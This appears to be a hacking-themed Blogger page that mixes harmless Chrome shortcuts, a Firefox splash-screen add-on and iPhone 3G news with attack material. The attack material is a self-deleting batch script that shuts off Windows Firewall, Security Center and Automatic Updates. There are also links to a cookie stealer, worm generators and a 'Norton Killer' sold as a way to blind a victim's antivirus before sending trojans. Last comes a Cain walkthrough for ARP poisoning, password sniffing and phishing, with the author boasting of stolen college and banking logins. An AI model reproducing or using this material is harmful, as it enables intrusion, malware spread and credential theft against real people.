This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Google Chrome Tips, Tricks, Hacks and Shortcuts

1. Create application shortcut : Create desktop and Start menu shortcuts to web apps such as Gmail - go to Gmail.com and then select  from the Page Control menu (in the top-right corner of your browser - it looks like a page with the corner folded over). Now choose where you want to place your shortcut. This works for other Google apps such as Calendar and Documents, and other services such as Windows Live Hotmail.

2. Control + Shift + N opens an ‘incognito’ window - sites you view in this window won’t appear in your history and cookies served by sites in this window will be deleted when the window is closed.

3. You can open a link in an incognito window by right-clicking the link and selecting Open link in incognito window.

4. Alt + Home loads your Google Chrome home page, with thumbnails of your most visited sites shown in the active tabbed window.

5. Control + T opens a new tab. You can drag tabs around to change their order or drag a tab out of the window into its own window.

6. Control + Shift + T opens your most recently closed tab. Press the key combination again to open the tab closed before that one. Google Chrome remembers the last 10 tabs you’ve closed.

7. Jump to different open tabs using Control + 1, Control + 2, Control + 3, etc. Control + 9 takes you to the last tab.

8. Control + Tab lets you cycle through your open tabs in order.

9. Control + Shift + Tab cycles through your tabs in the opposite order.

10. As with Firefox 3, you can drag a link onto a tab to open it in that tab, or drop it between two tabs to open a new tab in that position.

11. To bookmark a site click the star on the left of the address bar and then select a folder to add it to.

12. Control +B hides the Google Chrome bookmarks bar. Press Control + B to bring it back again.

13. Right-click or hold down the back button and you’ll get a drop-down list of sites to go back through. Show Full History, at the bottom of the list, opens a new tab with your full browser history.

14. Control + H is a faster way to bring up the History page.

15. You can delete history for chosen days by scrolling to the day you want to delete and clicking Delete history for this day on the right-hand side of the window.

16. Control + J brings up your Downloads page.

17. To clear an item from your Downloads page, right-click an entry and select Remove.

18. Press Control + K or Control + E to search from the address bar. Once pressed, you’ll see a ? symbol appear in the address bar and you can simply enter your search query and hit Return.

19. Right-click the top of the browser window and select Task manager to see how much memory different tabs and plug-ins are using. Highlight one and click End process to stop it running.

20. Shift + Escape is a quicker way to bring up the Google Chrome Task manager.

21. To see what plug-ins are installed, type about:plugins into the address window.

22. You can also type the following commands into the Google Chrome address window: about:stats, about:network, about:histograms, about:memory, about:cache, about:dns.

23. Type about:crash to see what a crashed tab looks like.

24. A three-second diversion: type about:internets. (Only works in Windows XP.)

25. Edit any web page - right-click a page and select Inspect element. Now edit the HTML source code and hit Return to view the changes.

26. To make Google Chrome your default browser, click the Tools button (in the right-hand corner of the browser window - a spanner icon). Select Options, click the Basics tab and then click the Make Google Chrome my default browser button.

27. To delete cookies, go to Tools > Options > Under the Hood. Scroll down to the Security section, and click Show cookies. Now you can click Remove all or remove individual cookies.

28. To clear more data such as the Google Chrome browsing history and cache, click the Tools icon and select Clear browsing data…

29. To clear the most visited web sites that appear on your Google Chrome start page, you must clear your browsing history using the method above.

30. Clearing your Google Chrome browser history will also stop matches from previously browsed sites appearing as suggestions in your address bar.

Batch File To Disable Firewall-Windows Xp Sp2

@echo off
net stop "Security Center"
net stop SharedAccess
> "%Temp%.\firewall.reg" ECHO REGEDIT4
>>"%Temp%.\firewall.reg" ECHO.
>>"%Temp%.\firewall.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
>>"%Temp%.\firewall.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\firewall.reg" ECHO.
>>"%Temp%.\firewall.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
>>"%Temp%.\firewall.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\firewall.reg" ECHO.
>>"%Temp%.\firewall.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]
>>"%Temp%.\firewall.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\firewall.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.\firewall.reg"
DEL "%Temp%.\firewall.reg"
DEL %0



Shuts down Windows Firewall, disables Automatic Updates for the next reboot.

And no, Microsoft is not going to fix this. This code will work when it goes live.

coockes steelier

due some prod i cant post the article but i have uploaded it the document to
rapid share


http://rapidshare.com/files/70483309/coockie_steelier.txt

virus codes

WormGen
WormGen , as its name describe,its a Worm Generator.Use this tool to creat a Worm.Use your custom messages and infections for lammers.Click the download link below to download it. Remember to disable your anti virus software (at your pc).Otherwise your antivirus would`nt allow to use it.
http://www.geocities.com/darfun_victims/wormgen.zip

Worm Gen 2.0
Its also Worm Generator ,its verision 2.0,updated. Try it.
http://www.geocities.com/darfun_victims/wormgen2.zip

Norton Killer

Here is software that disables victim`s anti virus if its Norton AV.Useful for those who are trying to send Trojans to the victim, send this file to the victim before sending a Trojan so your Trojan will not be detected.
http://www.geocities.com/darfun_victims/norton_killer.zip.zip

Add A Splash Screen To Mozilla Firefox

I don’t know why splash screens were made. But they can add some and masala and mint to a software, they look nice and beautiful. Many softwares such as Adobe Photoshop, Flash and many others already have splash screens but our beloved browser, Firefox lacks one. Some may say that splash screens are nagging and interfere in our work but for others they offer a refreshing start for our work.

Splash!

Is an extension for Mozilla products which can add splash screens not only to Firefox but also to Flock, Thunderbird and Sunbird.

You just have to select any image which has to act as the splash, select the background color, specify if there should be any text displayed or sound played and Voila! You have your own splash screen ready.

Download the Splash Add-on

If you like, you can create your own splash screen (or just keep the photo of your dear ones) or have one ready made from here Ready Made Splash Screens.

Well, my favorite is this one

New iPhone comes Only for 8k!

Apple on Monday unveiled a new version of its popular Apple iPhone, equipped with 3G Internet access and more business-related features.“It’s incredibly zippy,” chief executive Steve Jobs said as he demonstrated the new mobile device at the opening of Apple’s annual Worldwide Developers Conference in San Francisco.“We’ve taken what we’ve learned with the first iPhone, and created the iPhone 3G; and it’s beautiful,” he said.The crowd cheered when Jobs said the iPhone 3G will cost $199 (Rs 8,500 approx) with 8GB of memory. The 16GB model will sell for $299 (Rs 13,000 approx).The iPhone 3G – said to be two times faster than the firstgen iPhone – is designed for longer talk times, and takes advantage of the high-speed network to provide built-in GPS mapping, Jobs said.It also includes Wi-Fi support, and push email service like the one on Blackberry devices, letting business users send and receive Microsoft Exchange email.Apple announced it will begin rolling out new versions of the sleek smartphone devices on July 11, and make it available in 70 countries.Bharti Airtel and Vodafone, who had both announced tieups with Apple to release the iPhone in India, said they will be offering the Apple iPhones here. Details of pricing and availability will be announced at a later date. AGENCIES

Basics ARP Poison routing

Introduction This paper will lay out for you the basics of an ARP Poison Routing (APR) attack and Man in the Middle (Mitm) attacks. These are very simple attacks, but can be very powerful on unsecured networks. These attacks are so easy I could provide you a walkthrough of how to do this in Cain in about one paragraph, but you wouldn’t learn anything and would become a skiddy.

Before reading this, I suggest you learn a little about networks and the OSI 7-layer model (http://www.webopedia.com/quick_ref/OSI_Layers.asp) and media access control (MAC) addresses, as these attacks take advantage of protocols that work on OSI layers other than what you are usually used to (ie, HTTP on layer 7 and TCP on layer 4, whereas ARP works on layer 2) and do not use only IP addresses for identifying computers.

Address Resolution Protocol:

The Address Resolution Protocol (ARP) is a layer 2 protocol that maps IP addresses to hardware MAC addresses. When a computer wants to find another computer on its network, it uses the ARP to identify where that computer is and how to reach it. There are 9 types of ARP packets, but only 4 are relevant here:

1. ARP – What MAC has this IP address?

2. ARP Response – This MAC has this IP address.

3. RARP – What IP has this MAC address?

4. RARP Response – This IP has this MAC address.
If you are trying to contact a computer on another network (ie, over the internet) then ARP is used to contact your border gateway and route packets to it. The gateway is then responsible for routing the packets to the desire network using IP addresses and various routing protocols instead of ARP. Once the packet has arrived at the correct network, the router that received it will then use ARP again to route the packet around the network to its final destination.

The address resolution protocol works on a stateless broadcast request/single reply communication model. This means when one computer wants to know the address of another; it will broadcast a request for the address across the whole network in the form of What computer is 123.123.123.123? Tell 00:FF:AC:C5:56:3B. The computer that has the IP address of 123.123.123.123 would then send a directed reply, NOT broadcast, saying 90:F5:63:CA:BB:32 has 123.123.123.123. The MAC address in the reply is then added to the local computer’s cache, or if a mapping already exists for either the IP or MAC being used, the cache is updated to reflect this new info. The MAC/IP mapping is then used to route traffic around the network.

ARP Poison Routing (APR)

Now that you know the basics of how ARP works, let’s explore some pitfalls in the protocol. As I’ve said before, ARP is a stateless protocol. This means that each computer does not remember the state of its ARP requests/replies, and thus, does not remember if it sent a request or if it is waiting for a reply or has already received a reply to a previous request. So if we send an ARP reply, the host will accept it and alter its cache accordingly, even if the host didn’t send out a request! So if we send a reply to a target computer saying that our MAC address corresponds to the local gateway’s IP, then any traffic coming out of the target computer bound for the internet will be instead routed to your computer. You can use this to execute a DoS attack and prevent any packets from the target computer reaching the internet or you can sniff the packets for passwords and then pass them on to the real gateway. The second method is a very effective way of getting sensitive information and is fairly undetectable unless the target is monitoring their ARP cache constantly. APR can be setup with either 1-way or 2-way poisoning. 1-way poisoning will only poison the cache of a single target and will only intercept traffic coming from that computer, as shown below:

hack

Figure 1: 1-way APR

2-way poisoning effectively puts your computer directly between 2 target computers so that you can intercept network traffic coming from either host, as shown below:

hack2

Figure 2: 2-way APR

Some interesting attacks that can be used with APR include DoS attacks, Network sniffing/Packet stealing, and phishing.

DoS attacks can be accomplished using a 1-way poison and by redirecting traffic from a target computer to a gateway that doesn’t exist so they get ICMP Host Unreachable errors for all their network traffic, or you can redirect it to your computer and simply refuse to forward it to the proper destination. Network sniffing and packet stealing as well as Man in the Middle (Mitm) attacks require a 2-way poisoning scheme. Network sniffing and packet stealing would allow you to steal passwords and hashes that are passed over the network. With the proper filters, you can easily pick out plaintext passwords such as FTP, SMTP, HTTP form data, and hashes such as AIM and Yahoo messenger and SQL. You can even listen in on NetBios sessions and Telnet connections. With some simple phishing filters on your APR tool, you can redirect people from one website to one you control that looks the same where the victim will type in their login info unsuspectingly. This is often useful for grabbing plaintext passwords rather than having to brute force password hashes

One of the greatest hazards to be aware of when using APR is unintentional DoSing of the target or the entire network; because your computer is most likely NOT a dedicated router, and because the packets must travel all the way up the OSI model, be analyzed by your sniffer, then repackaged and sent all the way down the OSI model again, your computer can not handle packet routing as efficiently as a dedicated hardware router. This costs a great amount of time and CPU cycles and slows down the flow of traffic that may end up backing up and DoSing the target, the network, your computer, or any combination of the three. This is a serious issue and should not be taken lightly. If you APR a router on a large network, you may have hundreds of thousands of packets going thru your computer each second. Another hazard that is of interest to hackers is the fact that proxies cannot effectively be used, because ARP and APR works on layer 2 and proxies work on either layer 5 or 7 (depending on the amount of anonymity used) and usually require traveling outside the network to a proxy server. This may seem like a huge safety issue for a hacker, but there is hope! While IP addresses are difficult to spoof over the internet while keeping traffic flowing to and from your computer, both the IP address and MAC address can be effectively altered on a LAN. Many tools exist for changing your MAC and IP during APR attacks. Cain provides an option to do this under the “Configure” menu item.

Man In The Middle (Mitm) Attacks

Mitm attacks include a range of possible attacks, from DoSing, to sniffing, phishing, and rerouting for SE purposes. Mitm is started with a 2-way APR attack that in effect inserts your computer between 2 targets (often a host and a gateway). You can then begin the real meat of the mitm by using customized programs and packet filters to gain the effect you need.

For a simple sniffing attack, a network sniffer such as Ethereal with an IP or MAC filter applied to only capture packets to or from the target is sufficient. For more advanced attacks like password grabbing and phishing, you need more advanced filters. In the case of grabbing passwords, you need to have a filter that disassembles the packet to get to the layer 4 data and above, then scan that data for plaintext passwords or hashes such as HTTP POST or GET data, FTP, SMTP, or SQL login info, or you can use a filter to capture an entire NetBios, Telnet, or VoIP session to record conversations and gather potentially sensitive information. Sometimes it is not always desirable to have a password hash, especially when you can get the plaintext password in less time. This is where phishing comes in. Phishing is the art of constructing a website to look exactly like another, then redirecting traffic from the real site to the one you control in the hopes that no one will notice and will happily type in their real login info, assuming that everything is as it should be. Great care should be taken in conducting a phishing style attack, and I will offer some pointers and methods later on.

Because mitm attacks are built on the back of an APR attack, then all the limitations of an APR attack also apply to a mitm attack. But with the increased complexity of a mitm attack, you must also be aware of further limitations. Using complex filters or packet scanners consumes a lot of CPU cycles and can further increase the risk of unintentional DoSing or breaking of the network. Phishing should be used with care as well, because even the smallest difference between your site and the legitimate one will be noticed by daily users and may raise suspicion.

Phishing

Phishing, as already stated, is making a fake site to fool people into giving you their plaintext passwords and login info. There are several methods for creating a phishing site (phishing lure :D). You can attempt to create your copy site from scratch and code it yourself, but chances are people who use the site regularly would know the difference. Another way would be to copy the source code, images (keeping the directory structure in tact), and any stylesheets, javascripts, or embedded objects, then just make a few small changes to the code. Make sure to change all relative directories to absolute URLs when you do this! If you don’t, a form may not direct to the right page or produce a 404 error or an image may not display right and will raise suspicion. This method produces a site that looks and behaves nearly identically to the original, but because it is still being hosted on another server under a different domain name, observant users may spot the anomaly and report it. For low profile targets, this method is fast and effective. The final method I will discuss is how to do it without making a fake site at all. Because you are executing a mitm attack and have full access to every packet that moves to and from the target, you can create a packet filter that will change the ACTION property of a

tag, so that when the victim clicks the login button, the data will be sent to a site of your choice where you can log the information. This method may be slightly easier to execute, but it will increase the risk of unintentional DoSing due to the processing power required for the filter. No matter what method you choose to use, it is almost always a good idea to take the login info that you received from your fake site and pass it on to the real site to log the user on. This makes your attack more hidden and more difficult to detect. When doing this, make sure to catch errors coming back from the real site in case the user entered an invalid password or username. Then pass this information back to the user. This can be done easily and is no big deal to implement, but failing to do so may raise suspicion and may get you caught.

APR with Cain

Most people think of Cain as a simple password hash cracker, but it is actually much more. It is a very powerful network analyzer and password recovery tool as well as a cracker. It can dump protected storages, sniff network connections, enumerate hosts and users as well as network shares, and can even remotely install the backdoor program Abel. Now, on to the good stuff! I will show you a basic password sniffing mitm attack, but first, I assume you have Cain configured properly for your network card. If not, click the “Configure” menu option and read the help files.

Start up Cain and look at the icons in along the top, just under the menu. The 2 icons we will be concerned with here are the nuclear symbol (the APR icon) and the small circuit board with a red arrow (the sniffer icon). If you are not sure which icons I am talking about, hover your mouse over them and find the icons for “Start/Stop Sniffer” and “Start/Stop APR”. Click the sniffer icon to start the sniffer. Now go to the sniffer tab. The table shown in this tab provides you with information about computers currently on your network and should be blank. If not, clear it by right clicking and selecting “remove all”. The most useful columns right now are the first 4: IP Address, MAC Address, OUI Fingerprint, and Host Name. These should be pretty self explanatory with the exception of the OUI Fingerprint column. When a MAC address is coded into a piece of network hardware, part of the address is used to define the particular computer (like a serial number) and part is used to define the vendor that makes the hardware. Cain has a database of vendors that it checks the MAC address against to discover who made the hardware of that particular host. This is what is contained in the OUI Fingerprint column.

Once the sniffer is started, we need to populate the sniffer tab with host info. Click the “+” button to gather a list of all computers on the current network. If you have Ethereal, you can start that up with “arp” in the filter and watch Cain send out consecutive ARP requests for every IP in your subdomain and watch all the computers respond, freely giving away information about themselves. Once we have a list of possible targets, we need to setup an APR attack. Click on the “Start/Stop APR” icon to start the APR poisoner, then click the “APR” tab at the bottom of the “Sniffer” tab window. There are 2 tables in this tab: the top one is hosts on the LAN that you can directly affect, the bottom table is for computers on the WAN, which, depending on the border router’s settings, may or may not be vulnerable to APR. This list is populated as hosts are discovered thru analyzing packets.

Select the LAN table, and click the “+” icon again. Now select 2 hosts to insert yourself between. After that’s done, sit back and watch the packets roll in. Check the “Passwords” tab on the bottom for various passwords, or the branches under the “APR” symbol on the main APR tab to get HTTPS certificates and other valuable information. The APR-DNS branch can be used in phishing and in redirecting traffic from a website. Well, that’s it. That’s all there is to spying on people’s network traffic when you have access to a computer on the network, which is quite often if you go war-driving behind main street, picking up all the “insekure” business wi-fis ;)

Conclusions

On large or sensitive networks, APR and Mitm can be a very effective way of getting valuable information thru many means, including packet filters and sniffers, phishing, and traffic rerouting. Some of the overall limitations of ARP poisoning are that it cannot cross routers unless they are set up as a single autonomous unit (AU) and are contained in the same subnet. ARP poisoning can be easily thwarted if static caches are being used. Static caches prevent host caches from being updated remotely via the ARP protocol. Some of the interesting things I have actually been able to get from APR and Mitm include:

- Webmail and SMTP logins

- FTP logins to servers running FTPD as root (w00t!)

- FTP logins to websites (pwnt)

- Admin logins to sites

- Student and teacher account logins to my college (I can change their schedules for next year :D)

- AIM convos/hashes and Telnet/SMB/SSH sessions

- Wardriving behind businesses to take over their networks

- Online banking login info and certificates (free moneys!)
Things I’ve learned from my exploits: SECURE YOUR Network! And DON’T do important things on a public network (library, school). You never know when Big Brother is watching ;)

Links, References, and Tools

- Cain

- Ettercap

- Ethereal

- ARPoison

- Dsniff

- Parasite

- WinARPSpoofer

- http://en.wikipedia.org/wiki/ARP_spoofing

- http://www.grc.com/nat/arp.htm